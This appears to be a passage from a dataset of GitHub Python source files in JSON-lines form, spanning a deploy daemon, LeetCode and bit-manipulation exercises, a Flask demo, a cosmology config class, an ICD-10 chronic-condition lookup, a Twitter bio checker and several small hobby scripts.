format='%(asctime)s:%(levelname)s:%(name)s:%(message)s',\n filename=\"out.log\",\n filemode='a'\n)\n\"\"\"\n \nstdout_logger = logging.getLogger('STDOUT')\nstdout_logger.addHandler ( 
logging.FileHandler ( \"/var/log/auto1.log\" ) )\nsl = StreamToLogger(stdout_logger, logging.INFO)\nsys.stdout = sl\n \nstderr_logger = logging.getLogger('STDERR')\nstderr_logger.addHandler ( logging.FileHandler ( \"/var/log/auto1.log\" ) )\nsl = StreamToLogger(stderr_logger, logging.ERROR)\nsys.stderr = sl\n\ndef fork ( ):\n if os.fork ( ):\n os._exit ( 0 );\n\n os.chdir ( \"/\" )\n os.setsid ( )\n os.umask ( 0 )\n\n if os.fork ( ):\n os._exit ( 0 )\n #os.dup2 ( file ( os.devnull, \"r\" ).fileno ( ), sys.stdin.fileno ( ) )\n #os.dup2 ( file ( os.devnull, \"a+\" ).fileno ( ), sys.stdout.fileno ( ) )\n #os.dup2 ( file ( os.devnull, \"a+\", 0 ).fileno ( ), sys.stderr.fileno ( ) )\n\ndef deploy ( ):\n os.setuid ( 1000 )\n out = \"\"\n stdin, stdout, stderr = os.popen3 ( \"cd /var/bukaopu/; pwd; git pull origin master\" )\n out += stderr.read ( ) + stdout.read ( )\n stdin, stdout, stderr = os.popen3 ( \"supervisorctl -s http://127.0.0.1:9001 restart gunicorn\" )\n out += stderr.read ( ) + stdout.read ( )\n\n\ndef restart ( ):\n p = Process ( target = deploy )\n p.start ( )\n stdout_logger.info ( \"restart\" )\n return \"Ok\"\n \n\ndef echo ( s ):\n return s\n\n\ndef main ( ):\n server = SimpleXMLRPCServer ( ( '', 9002 ), SimpleXMLRPCRequestHandler, False )\n server.register_function ( restart, \"restart\" )\n server.register_function ( echo, \"echo\" )\n server.serve_forever()\n \nif \"__main__\" == __name__:\n fork ()\n main ( )\n","repo_name":"imcj/web_auto1","sub_path":"scripts/deploy1d.py","file_name":"deploy1d.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8551336966","text":"# https://leetcode.com/problems/replace-elements-with-greatest-element-on-right-side/\nfrom typing import List\n\n\nclass Solution:\n def replaceElements(self, arr: List[int]) -> List[int]:\n if len(arr) == 1:\n return [-1]\n\n rightMax = -1\n\n for i in range(len(arr) - 1, -1, -1):\n temp = max(rightMax, arr[i])\n arr[i] = rightMax\n rightMax = temp\n\n return arr","repo_name":"jeffreytigerwang/Python-Practice","sub_path":"easy/Replace Elements with Greatest Element on Right Side.py","file_name":"Replace Elements with Greatest Element on Right Side.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8810241394","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n # 3. dict이용 - O(1) ~ O(N)\n # dict에 저장\n nums_map = dict()\n for i, num in enumerate(nums):\n if (target - num) in nums_map:\n return [nums_map[target - num], i]\n nums_map[num] = i\n \n # 4. 투포인터 - O(NlogN) - O(NlogN) + O(N)임\n# nums = [(val, idx) for idx, val in enumerate(nums)]\n# nums = sorted(nums, key=lambda x:x[0])\n# result = []\n# left = 0\n# right = len(nums) - 1\n# while left < right:\n# temp = nums[left][0] + nums[right][0]\n# if temp > target:\n# right -= 1\n# elif temp < target:\n# left += 1\n# else:\n# return [nums[left][1], nums[right][1]]\n \n # # 2. in을 이용한 탐색 - O(N^2) brute force보다 빠름\n# for idx, val in enumerate(nums):\n# x = target - val\n# if x in nums[idx + 1:]:\n# return [nums.index(val), nums[idx+1:].index(x)+(idx+1) ]\n \n # 1. 
브루트포스 - O(N^2)\n # for i in range(len(nums)):\n # for j in range(i+1, len(nums)):\n # if nums[i] + nums[j] == target:\n # return [i, j]","repo_name":"Minsik113/Algorithm-practice","sub_path":"[책]파이썬알고리즘인터뷰/leetcode/2_배열/001_Two Sum.py","file_name":"001_Two Sum.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8584943138","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLesson 10 : 画正n边形\n\"\"\"\n\nimport turtle\n\nscr = turtle.Screen()\nt = turtle.Pen() # 初始化乌龟程序,调出图形框,准备好画笔\nt.shape(\"turtle\") # 改变画笔形状为一只乌龟,缺省是箭头arrow,\n# 还可以为 'circle'-圆, 'square'-正方形, 'triangle'-三角形, 'classic'. \n\nscr.bgcolor(\"white\") # (0.1,0.51,0.3) # red,green,blue 取值在0和1之间。1代表255,\n\nt.pensize(2) # 改变线宽度\nt.color(\"black\") # 改变画笔颜色,还有green,blue,black,white,pink,...,或者(r,g,b)\n\nt.penup()\nt.setpos(-100,-200)\nt.pendown()\n\n\n# print(\"画正多边形例子\")\nfor n in range(3,8):\n for i in range(n):\n t.fd(n*30)\n t.lt(360.0/n) # 逆时针旋转 2pi/n 度 \n \nscr.exitonclick()","repo_name":"liuxiang0/turtle_tutorial","sub_path":"Lesson-10 Draw n-poly.py","file_name":"Lesson-10 Draw n-poly.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6087205508","text":"myDNA = \"GATTATGCATGCATGCATGCATGCATGCATGCATGCATGCATGCACATTATTTATTTATTTATACAGATTATGCATGCATGCATGCATGCACATTATTTATTTATTTATTTATTTATTTATTTATTTATTTATTTATTTATACAGATTATGCATGCATGCATGCATGCATGCATGCATGCATGCATGCACATATAAAAAAAA\"\r\nmyIntronDNA = \"GATTATGCATGCATGCATGCATGCATGCATGCATGCATGCATGCACATTATTTATTTATTTATACAGATTATGCATGCATGCATGCATGCACATTATTTATTTATTTATTTATTTATTTATTTATTTATTTATTTATTTATACAGATTATGCATGCATGCATGCATGCATGCATGCATGCATGCATGCACATATAAAAAAAA\"\r\nexons = []\r\nintrons = []\r\ni = 0\r\n\r\n#list of exons in myDNA that start with GATT and end with ACA\r\nwhile len(myDNA) >= 3:\r\n\r\n #find exon that starts with GATT and ends with ACA\r\n exonStart = myDNA.find(\"GATT\")\r\n exonEnd = myDNA.find(\"ACA\") + 3\r\n exonSeq = myDNA[exonStart:exonEnd]\r\n\r\n #change myDNA to include all myDNA after exonEnd\r\n myDNA = myDNA[exonEnd :]\r\n\r\n #add exon sequence to exon list\r\n if len(exonSeq) >= 3 :\r\n exons.append(exonSeq)\r\n\r\n#print exon list from myDNA\r\nprint(\"Exons:\")\r\nprint(exons)\r\n\r\n#list of introns in myDNA that end with ACA but start with something else\r\nwhile len(myIntronDNA) >= 3 :\r\n\r\n # find intron that ends with ACA\r\n intronEnd = myIntronDNA.find(\"ACA\") + 3\r\n intronSeq = myIntronDNA[:intronEnd]\r\n\r\n # change myIntronDNA to include all myIntronDNA after intronEnd\r\n myIntronDNA = myIntronDNA[intronEnd:]\r\n\r\n # add intron sequence to intron list\r\n if len(intronSeq) >=3 :\r\n introns.append(intronSeq)\r\n\r\n#print intron list from myIntronDNA\r\nprint(\"Introns:\")\r\nprint(introns)\r\n\r\n#concatinate exons\r\nexonsString = \"\".join(exons)\r\n\r\n#print concatinated exon list from myDNA\r\nprint(\"Concatinated exons: \")\r\nprint(exonsString)\r\n","repo_name":"julia-terry/Python","sub_path":"SliceDice.py","file_name":"SliceDice.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17080547050","text":"import math, random\n\n# O(1) * n = O(n)\ndef count_bits(num):\n num_of_ones = 0\n while num:\n num_of_ones += num & 1\n num >>= 1\n return num_of_ones\n\n\n# O(1) * n = O(n)\ndef parity(num):\n number_parity = 0\n while num:\n number_parity ^= num & 
1\n        num >>= 1\n    return number_parity\n\n\n# O(1) * k = O(k), where k is the number of set bits\ndef parity_drop_first_set_bit(num):\n    num_of_parity = 0\n    while num:\n        num_of_parity ^= 1  # each pass clears exactly one set bit, so the parity flips\n        num &= (num-1)\n    return num_of_parity\n\n\n# Assuming parity has been precomputed in Precomputed for all 16 bit words\n# if L is the size of the word for which parity was precomputed and n is the word size\n# run time is O(n/L)\nPrecomputed = {}\ndef parity_precomputed(num):\n    mask = 16\n    bit_mask = 0xFFFF\n    return ( Precomputed[num >> mask * 3] ^\n             Precomputed[(num >> mask * 2) & bit_mask] ^\n             Precomputed[(num >> mask * 1) & bit_mask] ^\n             Precomputed[num & bit_mask] )\n\n\n# parity by divide and conquer: XOR-fold the top half onto the bottom half, O(log n)\ndef divide_and_conquer_parity(num, width=64):\n    if width == 1:\n        return num & 1\n    half = width // 2\n    folded = (num >> half) ^ (num & ((1 << half) - 1))\n    return divide_and_conquer_parity(folded, width=half)\n\n\n# O(1)\ndef swap(num, i, j):\n    if i == j:\n        return num\n    else:\n        num_i = num >> i\n        num_j = num >> j\n        if num_i & 1 == num_j & 1:\n            return num\n        else:\n            bit_mask = (1 << i) | (1 << j)\n            return num ^ bit_mask\n\n\nPrecomputed_reverse = {}\n# O(n/L)\ndef reverse_bits(num):\n    bit_mask = 0xFFFF\n    mask = 16\n    return (\n        Precomputed_reverse[num & bit_mask] << mask * 3 |\n        Precomputed_reverse[(num >> mask) & bit_mask] << mask * 2 |\n        Precomputed_reverse[(num >> mask * 2) & bit_mask] << mask |\n        Precomputed_reverse[num >> mask * 3]\n\n    )\n\n\n# O(n) where n is the length of unsigned num\ndef get_near_weighted_digits(num):\n    num_unsigned = 64\n    for i in range(num_unsigned -1):\n        if (num >> i) & 1 != ((num >> (i+1)) & 1):\n            num ^= ( (1 << i+1) | (1 << i) )\n            break\n    return num\n\n# O(n) for sum n times -> O(n^2)\ndef multiplying_with_binary(x, y):\n\n    def add(a, b):\n        while b:\n            carry = a & b\n            a, b = a ^ b , carry << 1\n        return a\n\n    result = 0\n    i = 0\n    while x > 0:\n        if (x & 1) == 1:\n            #result += (y << i)\n            result = add(result, (y << i))\n        x >>= 1\n        y <<= 1\n    return result\n\n\ndef divide_using_bits(x, y):\n    quotient, power = 0, 32\n    y_power = y << power\n    while x >= y:\n        if y_power <= x:\n            quotient += 1 << power\n            x -= y_power\n        power -= 1\n        y_power >>= 1\n\n    return quotient, x\n\n\n# need to study again\ndef power_using_bits(x, y):\n    result , power = 1.0, y\n    if y < 0:\n        power, x = -power, 1.0 / x\n    while power:\n        if power & 1:\n            result *= x\n        x *= x\n        power >>= 1\n    return result\n\n\n# O(n) where n is the number of digits\ndef reverse_digits(x):\n    sum, num = 0 , abs(x)\n    while num:\n        sum = sum * 10 + num % 10\n        num = num // 10\n\n    return -sum if x < 0 else sum\n\n\n# time O(n) and space is O(1)\ndef is_pandialdrome(num):\n    if num <= 0:\n        return num == 0\n\n    num_digits = math.floor(math.log10(num)) + 1\n    big_mask = 10**(num_digits - 1)\n\n    while num :\n\n        if num % 10 != num // big_mask:\n            return False\n\n        num = num % big_mask\n        num = num // 10\n        big_mask = big_mask // 100\n\n    return True\n\n\n# O(log(b-a+1))\ndef create_random_numbers(a, b):\n    number_of_outcomes = b-a + 1\n    while True:\n        result , i = 0, 0\n        while (1 << i) < number_of_outcomes:\n            result = (result << 1) | random.randint(0, 1)\n            i += 1\n        if result < number_of_outcomes:\n            break\n    return result + a\n","repo_name":"JishnuRamesh/Algorithms-and-datastructures","sub_path":"PrimitiveTypes/count_bits.py","file_name":"count_bits.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"19474423774","text":"from __future__ import annotations\n\nfrom collections.abc import Iterator, Sequence\nfrom dataclasses import dataclass, field\nfrom typing import TYPE_CHECKING\n\nimport numpy as np\nfrom deprecated import deprecated\n\nfrom yaw.config import default as DEFAULT\nfrom yaw.config.abc import BaseConfig\nfrom yaw.config.utils import ConfigError\nfrom yaw.core.cosmology import Scale\nfrom yaw.core.docs import Parameter\nfrom yaw.core.math import array_equal\n\nif TYPE_CHECKING: # pragma: no cover\n    from numpy.typing import NDArray\n\n__all__ = [\"ScalesConfig\"]\n\n\n@dataclass(frozen=True)\nclass ScalesConfig(BaseConfig):\n    \"\"\"Configuration of scales used for correlation measurements.\n\n    Correlation functions are measured on one or many intervals\n    :math:`r_{\\\\rm min} \\\\leq r < r_{\\\\rm max}` of angular diameter distance in\n    kpc. When measuring correlations, this scale is converted to angles at the\n    current redshift.\n\n    Additionally, pairs can be weighted by their separation\n    :math:`r^\\\\alpha` if a power-law exponent is provided through ``rweight``.\n    The weighting is applied in logarithmically spaced bins of separation (based\n    on the logarithmic bin centers). This is an approximation to actually\n    weighting each pair individually and the resolution of this approximation\n    can be controlled by setting the number of bins.\n\n    Args:\n        rmin (:obj:`float`, :obj:`list[float]`):\n            Single or multiple lower scale limits in kpc (angular diameter\n            distance).\n        rmax (:obj:`float`, :obj:`list[float]`):\n            Single or multiple upper scale limits in kpc (angular diameter\n            distance).\n        rweight (:obj:`float`, optional):\n            Power-law exponent used to weight pairs by their separation.\n        rbin_num (:obj:`int`, optional):\n            Number of radial logarithmic bins used to approximate the weighting\n            by separation.\n    \"\"\"\n\n    rmin: list[float] | float = field(\n        metadata=Parameter(\n            type=float,\n            nargs=\"*\",\n            required=True,\n            help=\"(list of) lower scale limit in kpc (physical)\",\n        )\n    )\n    \"\"\"Lower scale limit(s) in kpc (angular diameter distance).\"\"\"\n    rmax: list[float] | float = field(\n        metadata=Parameter(\n            type=float,\n            nargs=\"*\",\n            required=True,\n            help=\"(list of) upper scale limit in kpc (physical)\",\n        )\n    )\n    \"\"\"Upper scale limit(s) in kpc (angular diameter distance).\"\"\"\n    rweight: float | None = field(\n        default=DEFAULT.Scales.rweight,\n        metadata=Parameter(\n            type=float,\n            help=\"weight galaxy pairs by their separation to power 'rweight'\",\n            default_text=\"(default: no weighting applied)\",\n        ),\n    )\n    \"\"\"Power-law exponent used to weight pairs by their separation.\"\"\"\n    rbin_num: int = field(\n        default=DEFAULT.Scales.rbin_num,\n        metadata=Parameter(\n            type=int,\n            help=\"number of bins in log r used (i.e. resolution) to compute distance weights\",\n            default_text=\"(default: %(default)s)\",\n        ),\n    )\n    \"\"\"Number of radial logarithmic bins used to approximate the weighting by\n    separation.\"\"\"\n\n    def __post_init__(self) -> None:\n        msg_scale_error = \"scales violates 'rmin' < 'rmax'\"\n        # validation, set to basic python types\n        scalars = (float, int, np.number)\n        if isinstance(self.rmin, (Sequence, np.ndarray)) and isinstance(\n            self.rmax, (Sequence, np.ndarray)\n        ):\n            if len(self.rmin) != len(self.rmax):\n                raise ConfigError(\n                    \"number of elements in 'rmin' and 'rmax' do not match\"\n                )\n            # for clean YAML conversion\n            for rmin, rmax in zip(self.rmin, self.rmax):\n                if rmin >= rmax:\n                    raise ConfigError(msg_scale_error)\n            if len(self.rmin) == 1:\n                rmin = float(self.rmin[0])\n                rmax = float(self.rmax[0])\n            else:\n                rmin = list(float(f) for f in self.rmin)\n                rmax = list(float(f) for f in self.rmax)\n            object.__setattr__(self, \"rmin\", rmin)\n            object.__setattr__(self, \"rmax\", rmax)\n        elif isinstance(self.rmin, scalars) and isinstance(self.rmax, scalars):\n            # for clean YAML conversion\n            object.__setattr__(self, \"rmin\", float(self.rmin))\n            object.__setattr__(self, \"rmax\", float(self.rmax))\n            if self.rmin >= self.rmax:\n                raise ConfigError(msg_scale_error)\n        else:\n            raise ConfigError(\"'rmin' and 'rmax' must be both sequences or float\")\n\n    def __eq__(self, other: object) -> bool:\n        if isinstance(other, self.__class__):\n            return (\n                array_equal(self.as_array(), other.as_array())\n                and self.rweight == other.rweight\n                and self.rbin_num == other.rbin_num\n            )\n        return NotImplemented\n\n    def __getitem__(self, idx: int) -> Scale:\n        scales = self.as_array()\n        return Scale(rmin=scales[idx, 0], rmax=scales[idx, 1])\n\n    def __iter__(self) -> Iterator[Scale]:\n        for rmin, rmax in self.as_array():\n            yield Scale(rmin=rmin, rmax=rmax)\n\n    def modify(\n        self,\n        rmin: list[float] | float = DEFAULT.NotSet,\n        rmax: list[float] | float = DEFAULT.NotSet,\n        rweight: float | None = DEFAULT.NotSet,\n        rbin_num: int = DEFAULT.NotSet,\n    ) -> ScalesConfig:\n        return super().modify(rmin=rmin, rmax=rmax, rweight=rweight, rbin_num=rbin_num)\n\n    def as_array(self) -> NDArray[np.float_]:\n        \"\"\"Obtain the scale cuts as an array of shape (N, 2)\"\"\"\n        return np.atleast_2d(np.transpose([self.rmin, self.rmax]))\n\n    @deprecated(\"use [str(scale) for scale in ScalesConfig] instead\", version=\"2.3.1\")\n    def dict_keys(self) -> list[str]:\n        \"\"\"Get the scale cuts formatted as a list of strings.\n\n        Format is ``kpc[rmin]t[rmax]``, used as keys to pack outputs of\n        correlation measurements in a dictionary when measuring with multiple\n        scale cuts.\n\n        .. deprecated:: 2.3.1\n            Use instead\n\n            >>> [str(scale) for scale in ScalesConfig]\n            ...\n        \"\"\"\n        return [str(scale) for scale in self] # pragma: no cover\n","repo_name":"jlvdb/yet_another_wizz","sub_path":"src/yaw/config/scales.py","file_name":"scales.py","file_ext":"py","file_size_in_byte":6366,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
+{"seq_id":"7893527061","text":"import json\nimport logging\n\nfrom flask import Flask\n\napp = Flask(__name__)\n\nnumber = 1234578\nnum = [x for x in str(number)]\nfirst_set = \"\".join(num[:3])\nrest_of_the_set = \"\".join(num[3:])\n# step through the remaining digits in groups of three\nfor i in range(0, len(rest_of_the_set), 3):\n    print(int(first_set))\n    print(rest_of_the_set)\n\n\n\n@app.route(\"/\")\ndef hello():\n    app.logger.info('Metrics request successful')\n    return \"Hello World!\"\n\n\n@app.route(\"/status\")\ndef status_check():\n    response = app.response_class(\n        response=json.dumps({\"Result\": \"Ok - healthy\"}), status=200, mimetype='application/json'\n    )\n    app.logger.info(\"Success\")\n    return response\n\n\n@app.route(\"/metrics\")\ndef metrics_check():\n    metric_response = app.response_class(\n        response=json.dumps({\"status\": \"Success\", \"code\": 0, \"data\": {\"UserCount\": 140, \"UserCountActive\":23}}),\n        status=200,\n        mimetype=\"application/json\"\n    )\n    app.logger.info(\"That's how it's done\")\n    return metric_response\n\n@app.route(\"/something\")\ndef funct():\n    # minimal stub response so the handler is complete and returns valid JSON\n    jsoresp = app.response_class(\n        response=json.dumps({\"status\": \"ok\"}),\n        status=200,\n        mimetype=\"application/json\"\n    )\n    return jsoresp\n\n\n\nif __name__ == \"__main__\":\n    logging.basicConfig(filename='app.log', level=logging.DEBUG)\n    app.run(host='0.0.0.0')\n","repo_name":"Ken-muigai/nd001_go_docker_kubernetes","sub_path":"exercises/python-helloworld/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"14642839368","text":"import hcuppy.utils as utils\n\nclass CCIEngine:\n\n    def __init__(self):\n        fn = \"data/cci_icd10cm_2019_1.csv\"\n        self.dx2cci = utils.read_cci(fn)\n\n    def get_cci(self, dx_lst):\n        \"\"\"\n        Returns CCI or a list of CCI for the given ICD code(s).\n        Here, CCI stands for Chronic Condition Indicator.\n        The original software can be found at \n        https://www.hcup-us.ahrq.gov/toolssoftware/\n            chronic_icd10/chronic_icd10.jsp\n\n        Parameters\n        ----------\n        dx_lst : list of str, or str\n            A list of ICD10 diagnosis codes.\n            The output is a list of corresponding CCIs.\n            If this parameter is a scalar (not a list), then \n            the output will be a scalar.\n        \"\"\"\n\n\n        output_type = \"list\"\n        if not isinstance(dx_lst, list):\n            output_type = \"value\"\n            dx_lst = [dx_lst]\n        \n        dx_lst = [dx.strip().upper().replace(\".\",\"\") for dx in dx_lst]\n        cci_lst = []\n        out_default = {\"is_chronic\": False,\n                    \"body_system\": \"na\",\n                    \"body_system_desc\": \"na\"}\n        for dx in dx_lst:\n            if dx not in self.dx2cci:\n                cci_lst.append(out_default)\n            else:\n                cci_lst.append(self.dx2cci[dx])\n\n        out = cci_lst\n        if output_type == \"value\":\n            out = cci_lst[0]\n        \n        return out\n\n    def has_chronic(self, dx_lst):\n        cci_lst = [cci for cci in self.get_cci(dx_lst)]\n        return any(cci[\"is_chronic\"] for cci in cci_lst)\n\n    def is_chronic(self, dx):\n        cci = self.get_cci(dx)\n        return cci[\"is_chronic\"] \n\n\n","repo_name":"yubin-park/hcuppy","sub_path":"hcuppy/cci.py","file_name":"cci.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"72"}
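The CCIEngine record above upper-cases each code and strips dots before the lookup, and it mirrors the input shape in its output. A short usage sketch, assuming the class as defined in that record; the ICD-10 codes are illustrative and the returned chronic flags depend entirely on the bundled CSV:

# hypothetical usage; actual results come from data/cci_icd10cm_2019_1.csv
engine = CCIEngine()
one = engine.get_cci("I10")                 # str in -> a single dict out
many = engine.get_cci(["I10", "J45.909"])   # list in -> list of dicts out
                                            # "J45.909" is looked up as "J45909"
print(one["is_chronic"], one["body_system"])
print(engine.has_chronic(["I10", "J45.909"]))  # any() over the per-code flags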
+{"seq_id":"26052695041","text":"d1={\"bread\":{\"prize\":70,\"quantity\":10},\n \"butter\":{\"prize\":100,\"quantity\":20},\n \"milk\":{\"prize\":110,\"quantity\":23},\n \"coffee\":{\"prize\":1000,\"quantity\":30}}\nl1=[]\nl2=[]\nl3=[]\nl4=[]\n\nprint(\"items we have \")\nfor i in d1.keys():\n l1.append(i)\nfor i in d1.values():\n l2.append(i)\nfor i in range(len(l1)):\n print(i+1,\")\",l1[i])\nfor i in l1:\n l3.append(d1[i][\"prize\"])\nl5=[]\ni1=int(input(\"enter how many items you wana buy \"))\ni=0\nwhile(i<=i1):\n # a=str(input(\"do you wana buy something \\n\"))\n # if a==\"yes\":\n a2=str(input(\"enter name of an item\"))\n a3=int(input(\"enter the no of \"))\n l4.append(a2)\n if a3==1:\n l5.append(d1[a2][\"prize\"])\n else:\n a=a3*d1[a2][\"prize\"]\n l5.append(a)\n a4=d1[a2][\"quantity\"]\n d1[a2][\"quantity\"]=a4-a3\n i=i+1\n\nprint(\"the items you bought is \\t\\t\\t prize\")\nfor i in range(len(l4)):\n print(i+1,l4[i],\"\\t\\t\\t\\t\\t\\t\\t\",l5[i])\nprint(\"your total bill is \",sum(l5))\nfor i in d1.keys():\n print(\"the items left\",i,d1[i][\"quantity\"])\n# in_put=str(input(\"enter the items you wana buy\"))\n","repo_name":"aun2810/first-repository","sub_path":"pytho.py","file_name":"pytho.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41979493616","text":"import numpy as np\nimport matplotlib.pyplot as pl \n\ndef sOfn(p,n):\n return 1/((1-p)+(p/n))\n \n \np = [0.5, 0.6, 0.7, 0.8, 0.9, 0.95]\nn = range(1,65536)\n\nfor i in p:\n pl.figure()\n iRange = [i]*len(n)\n a = map(sOfn,iRange,n)\n aMax = max(a)\n aMaxList = [aMax]*len(a)\n eps = 0.05*aMax\n difference = np.array(aMaxList) - np.array(a)\n procMinApprox = np.where(difference<=eps)[0][0]\n print ('Approximate number of processors required for 95% of maximum speed up ' + str(procMinApprox))\n\n pl.plot(n,a,label=('p = ' + str(i)))\n \n pl.legend(loc=4)\n pl.ylabel('run time speed up')\n pl.xlabel('log base 2 number of processors')\n pl.title('Run time speed up vs. # of processors for p =' + str(i))\n fig = pl.gcf()\n pl.xscale('log',basex=2)\n fig.set_size_inches(5,5) \n\npl.figure()\nfor i in p:\n iRange = [i]*len(n)\n a = map(sOfn,iRange,n)\n pl.plot(n,a,label=('p = ' + str(i)))\n\npl.legend(loc=4)\npl.ylabel('run time speedup')\npl.xlabel('log base 2 number of processors')\npl.title('Run time speed up vs. 
# of processors for various values of p')\nfig = pl.gcf()\npl.xscale('log',basex=2)\nfig.set_size_inches(10,10) \nplt.rcParams.update({'axes.titlesize': 'small'})\n\n","repo_name":"davidjuliancaldwell/ScientificSupercomputing","sub_path":"astro598scientific/davidcaldwell_hw7/amdahlsLaw.py","file_name":"amdahlsLaw.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29048459178","text":"# How many newsletter authors have associated Twitter accounts?\n# How many of those accounts mention Substack in bio?\n# %%\nimport glob\nimport json\nimport os\n\nfrom dotenv import load_dotenv\nimport twitter\nfrom tqdm import tqdm\n\nload_dotenv()\n# %%\nfiles = glob.glob(\"../data/*.json\")\n# %%\nnl = []\nfor i in files:\n with open(i, \"r\", encoding=\"utf-8\") as f:\n data = json.load(f)\n nl.extend(data)\n\n# %%\ntwitter_names = [i['twitter_screen_name'] for i in nl if 'twitter_screen_name' in i]\n\n# %%\nlen(set(twitter_names))\n# %%\nlen(twitter_names)/len(nl)\n\n# %%\napi = twitter.Api(consumer_key=os.environ[\"CONSUMER_KEY\"],\n consumer_secret=os.environ[\"CONSUMER_SECRET\"],\n access_token_key=os.environ[\"ACCESS_KEY\"],\n access_token_secret=os.environ[\"ACCESS_SECRET\"],\n sleep_on_rate_limit=True)\n# %%\nresults = []\nfor i in tqdm(twitter_names):\n try:\n desc = api.GetUser(screen_name=i).description\n substack = \"substack\" in desc.lower()\n result = {\"user\": i, \"description\": desc, \"mentions_substack\": substack}\n results.append(result)\n except twitter.TwitterError as e:\n print(e)\n pass\n# %%\nsum([i['mentions_substack'] for i in results])/len(nl)\n","repo_name":"NHagar/substack-collection","sub_path":"scripts/twitter_check.py","file_name":"twitter_check.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70040519593","text":"import sqlite3\nconn = sqlite3.connect('example.db')\n\ncursor = conn.cursor()\n\ncursor.execute(\"DROP TABLE IF EXISTS CONTACT\")\n\nsql = '''CREATE TABLE CONTACT(\n FIRST_NAME CHAR(20) NOT NULL,\n LAST_NAME CHAR(20),\n ID INT\n)'''\ncursor.execute(sql)\nprint(\"table created successfully.................\")\n\nconn.commit()\nconn.close()","repo_name":"arviinnd-5989/Sqlite3-tutorial","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16928639971","text":"\r\n#%%\r\n#%matplotlib inline\r\n# module importeren om request te doen\r\nimport urllib.request\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nimport numpy as np\r\nfrom scipy.stats import norm\r\nfrom scipy.stats.stats import pearsonr\r\n\r\nimport pandas as pd\r\nimport json\r\n\r\nplt.style.use('seaborn')\r\n\r\nMandaten = list()\r\nBlanco = list()\r\nkieskring = list()\r\nkieskring.append({\"gemeente\":\"dsfdfsd\", \"partij\":\"sdfdsfsf\"})\r\n\r\n\r\n\r\n# variabele om requested data in te plaatsen\r\nkieskringdata = urllib.request.urlopen(\r\n \"http://www.rocre.be/verkiezingen/json.php?fields=blanco_ongeldig,kieskring,lijst,zetels&duplicates=false\").read()\r\n\r\n# De data die we terugkeren gaan laden in JSON formaat\r\ndata = json.loads(kieskringdata)\r\n\r\n# Omdat de json data in een wrapper van results zit dit gaan vervangen zodat de code op volgende lijnen korter is.\r\ndata = data[\"results\"]\r\n\r\n\r\ndef search(gemeente, 
lijst):\r\n for d in kieskring:\r\n if(gemeente in d.values() and lijst in d.values()):\r\n return True\r\n else:\r\n found = False\r\n return found\r\n\r\n\r\nfor x in data:\r\n if(search(x[\"kieskring\"], x[\"lijst\"]) == False):\r\n thisdict = {\r\n \"gemeente\": x[\"kieskring\"],\r\n \"zetels\" : float(x[\"zetels\"]),\r\n \"lijst\" : x[\"lijst\"],\r\n \"blanco\" : float(x[\"blanco_ongeldig\"])\r\n }\r\n kieskring.append(thisdict)\r\n\r\nkieskring.pop(0)\r\n\r\ndataframe = pd.DataFrame(kieskring)\r\nprint(dataframe)\r\n#newlist = sorted(kieskring, key=lambda k: k['mandaten']) \r\n\r\n#print(len(newlist))\r\n\r\nfor p in kieskring:\r\n #if(float(p[\"mandaten\"]) < 49 or float(p[\"blanco\"]) < 2000):\r\n Mandaten.append(p[\"zetels\"])\r\n Blanco.append(p[\"blanco\"])\r\n\r\nprint(pearsonr(Mandaten, Blanco))\r\nprint(len(Mandaten))\r\nplt.scatter(Mandaten, Blanco)\r\n\r\nz = np.polyfit(Mandaten, Blanco, 1)\r\np = np.poly1d(z)\r\nplt.plot(Mandaten,p(Mandaten),\"r--\")\r\n\r\nplt.xlabel(\"Mandaten\")\r\nplt.ylabel(\"Blanco stemmen\")\r\n\r\n\r\nplt.show()\r\n\r\n#Er is geen verband \r\n\r\n","repo_name":"TijsDeBelie/BigDataVerkiezingen","sub_path":"BD_verkiezingen/Python scripts/stelling3-bis.py","file_name":"stelling3-bis.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"nl","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41500931855","text":"# -*- coding :utf-8 -*-\n\nfrom openerp import models,fields,api\n\nclass CRMLeadEpt(models.Model):\n _name=\"crm.lead.ept\"\n _description=\"CRM Lead\"\n\n partner_id=fields.Many2one(comodel_name=\"res.partner.ept\",string=\"Partner\")\n order_ids=fields.One2many(comodel_name=\"sale.order.ept\",inverse_name=\"crm_lead_id\",string=\"Order\",readonly=True)\n team_id = fields.Many2one(comodel_name=\"crm.team.ept\",string=\"CRM Team\")\n 